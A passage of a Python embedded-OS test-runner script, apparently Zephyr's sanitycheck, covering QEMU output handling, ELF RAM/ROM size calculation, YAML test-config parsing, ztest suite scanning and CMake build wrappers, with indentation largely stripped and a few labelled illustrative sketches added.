self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering; we don't want read() or poll()
# to ever block if there is data in there.
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
# There's a possibility we polled nothing because the host scheduled
# too little CPU time to the QEMU process during
# p.poll(this_timeout).
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means the test is doing well; we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# Sometimes QEMU can't handle the SIGTERM signal correctly; in that
# case, kill the QEMU process directly with SIGKILL and leave
# sanitycheck to judge the testing result from the console output.
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
logger.debug(f"No timeout, return code from qemu: {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
logger.debug(f"return code from qemu: {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
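# Illustrative sketch (not part of the original script): the adaptive timeout
# used in QEMUHandler._thread() above. When poll() reports nothing but the
# QEMU process has consumed less CPU time than the allotted timeout (guest
# time in icount mode advances with executed instructions, not host time),
# the deadline is pushed out by the unused budget. The numbers are invented.
def _qemu_timeout_extension_example(timeout=60, cpu_time=12.5):
    import time

    if cpu_time < timeout:
        timeout_time = time.time() + (timeout - cpu_time)
        return ("keep waiting", timeout_time)
    return ("timeout", None)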
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in an ad hoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
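# Illustrative sketch (not part of the original script): the type strings
# accepted by _cast_value(), matching the "type" metadata documented in
# get_test() above. The parser is constructed with dummy arguments, which is
# safe here because load() is never called.
def _cast_value_examples():
    scp = SanityConfigParser("dummy.yaml", schema=None)
    return [
        scp._cast_value("60", "int"),             # -> 60
        scp._cast_value("native posix", "list"),  # -> ['native', 'posix']
        scp._cast_value("1 2 3", "list:int"),     # -> [1, 2, 3]
        scp._cast_value("usb ble", "set"),        # -> {'usb', 'ble'}
    ]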
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, this can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting at the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# Can't find ztest_test_suite; this is probably just a client file
# that includes ztest.h without defining a suite.
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
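# Illustrative sketch (not part of the original script): what scan_file()
# above extracts from a minimal ztest main.c. The C snippet and the temporary
# file are fabricated for demonstration.
def _ztest_scan_example():
    import tempfile

    src = """
    void test_main(void)
    {
        ztest_test_suite(sample_suite,
            ztest_unit_test(test_alpha),
            ztest_user_unit_test(test_beta));
        ztest_run_test_suite(sample_suite);
    }
    """
    with tempfile.NamedTemporaryFile("w", suffix=".c", delete=False) as f:
        f.write(src)
        path = f.name
    matches, warnings = TestCase.scan_file(path)
    os.unlink(path)
    return matches, warnings   # -> (['alpha', 'beta'], None)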
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# Right now we only support building on Windows; running is still
# work in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
self.suite.build_filtered_tests += 1
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
else:
ldflags = cflags = aflags = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
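# Illustrative sketch (not part of the original script): how the config_re
# pattern defined on the CMake class turns a generated .config line into a
# filter_data entry, as done in parse_generated() above. The Kconfig line is a
# fabricated example.
def _defconfig_line_example():
    import re

    config_re = re.compile(r'(CONFIG_[A-Za-z0-9_]+)[=]"?([^"]*)"?$')
    m = config_re.match('CONFIG_BT_DEVICE_NAME="Zephyr"')
    return {m.group(1): m.group(2).strip()}  # {'CONFIG_BT_DEVICE_NAME': 'Zephyr'}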
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
